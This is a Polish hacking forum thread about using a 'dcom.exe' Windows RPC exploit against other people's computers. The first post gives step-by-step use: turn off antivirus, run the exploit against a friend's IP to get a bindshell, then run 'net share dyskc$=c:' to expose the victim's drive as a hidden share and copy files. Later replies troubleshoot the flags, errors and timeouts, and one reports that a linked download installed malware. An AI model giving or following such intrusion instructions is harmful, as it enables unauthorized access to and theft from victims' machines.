Obsługa Dcom

Benben

Użytkownik
Dołączył
Grudzień 1, 2004
Posty
19
Znalazłem fajną stronke gdzie opisany jest dokłady opis dcom
smile.gif


1. sciagamy dcoma

2. Wylaczamy AntyVira bo nam wykryje jako wirusa!! :] to chyba wiecie ;]

3. kopiujemy na dysk D lub C jak kto woli

4. Naciskamy START / URUCHOM i wpisujemy zlaeznie od systemu :

COMMAND, lub CMD po chwili powinno otworzyc nam sie okienko konsoli :]

wtedy przechodzimy na dysk na ktorym jest dcom np. gdy mamy dcoma na C: to piszemy : cd c:

no i teraz juz go odpalamy

C:>dcom.exe

i pokarza nam sie literki hrhrhr w ktorych tak naprawde jestnapsiane jak go uzyc, najlatwiej jest uzyc go w ten posob :

C:>dcom.exe -d IP_KOLEGI -T 0 lub 1 gdzie 0 - to win2k a 1-winXP

i po poprawnym wejsciu do kolegi powinnismy ujrzec napis :

################

connected to bindshell

c:windowssystem32

###################

i juz jestesmy od niego w systemie... jak cos sciagnac? to latwe;] najlatwiej udostepnic jego dyski
<
hrhr robimy to tak :

w jego komputerze tam na konsoli piszemy net share dyskc$=c:

co udostepni jego dysk na niewidocznym

$ = oznacza ze jesli ktos wejdzie do niego nie bedzie widziec jego udostepnionego dysku!

pozniej tylko w przegladarce wpisujemy jegoipdyskc$ i juz jestesmy w jego komputerze
<
kopiujemy co chcemy i spadamy ;]
 

pawelloo

Użytkownik
Dołączył
Kwiecień 26, 2003
Posty
216
fajny opis... a nie latwiej podac stronke z opisem???moze nawet nie latwiej ale i lepiej by tak bylo
 

Tobi

Użytkownik
Dołączył
Listopad 23, 2004
Posty
114
Ja znam stronke
Wystarczy wziasc zakladke "uzytkownicy" tam wyzej i wziasc "wszystkich postow" i "malejonco" i "sortuj" no i wybrac pierwsza osobe z listy czyli ta co ma najwicej postow
<
 

smr7

Użytkownik
Dołączył
Styczeń 31, 2005
Posty
53
a jak wpisac na klwiaturze ten znaczek "$"

--------------
co robie zle ?? to jest komenda i to co wyskoczylo po pisaniu

dcom.jpg
 

smr7

Użytkownik
Dołączył
Styczeń 31, 2005
Posty
53
am4tor tak ja mowisz tez probowalem, to chyba faktycznie nie dziala pod xp... moze znacie jeszce jakies explity a do nich opis jak sie poslugiwac ??
 

Nieudacznik13

Użytkownik
Dołączył
Marzec 18, 2004
Posty
5
He ok. Wiec troche sie pobawilem i dziala to na xp. Zle robicie zapominacie o jednej rzeczy co tu widze.
-r Return address [Default: Selected from target] wlasne IP -l Bindshell
inaczej -r nasze IP
smile.gif
 

ziomek_bydzia

Użytkownik
Dołączył
Marzec 1, 2005
Posty
2
problem z dcom

mam problem z exploitem dcom pod winde. mianowicie wyskakuje mi taki bląd: 10060, o co chodzi? to znaczy że ja xle skonfigurowałęm coś, czy o to że np. "ofiara" ma firewalla?

blad.jpg
 

ziomek_bydzia

Użytkownik
Dołączył
Marzec 1, 2005
Posty
2
ok, juz wiem, troche zmuliłem. teraz mam napis "connected to bindshell", a pod spodem "-- bling bling --" i cały czas wyświetla mi zasoby mojego konta bo mam dalej "C:Documents and Setinngs(nazwa mojego użytkownika)", o co teraz chodzi??
 

lool

Użytkownik
Dołączył
Grudzień 12, 2004
Posty
11
możecie mi powiedziec czemu, jak zawsze chce sie z kimś połączyć to wyskakuje mi Timeout
 

cool666

Użytkownik
Dołączył
Grudzień 27, 2004
Posty
24
Mam pytanie, skąd wiąść DCom'a z tym że prosiłbym o podanie linku do pliku .exe
 

rafal759

Użytkownik
Dołączył
Lipiec 30, 2004
Posty
113
Originally posted by NiuNio+--><div class='quotetop'>CYTAT(NiuNio)</div>
<!--QuoteBegin-spec60
oty mały pojebań.... skur.... nieklikajcie tego sywfu :/

wszystko jest ok, nie rozumiem?[/b]

hehe, domyślam sie o co mu chodził, to jest jego 1 post, niewie pewnie co to exploit zobaczył link ściągnął tego exploita i antyvir mu wykrył, a on pomyśłał pewnie że tojest właśnie jakiś syf a to jest poprostu zwykły exploit nie ma sie czego bać tobie nic nierozwali :p
<
 

spec60

Użytkownik
Dołączył
Sierpień 28, 2004
Posty
3
nie nie oto mi chodzi kiedy kliknołem na tego linkaaa owszem anty iwr zaczoł wykrywać w ....... wirów ale zaczeły mi wyskakiwać reklamówki i ładować syw do kompa pozatym antyspyware wykrywał wiele procesów łaczenia sie różnych ip i różnych adresów z moim kompem więc soryyyyyyyy :/
 
Do góry Bottom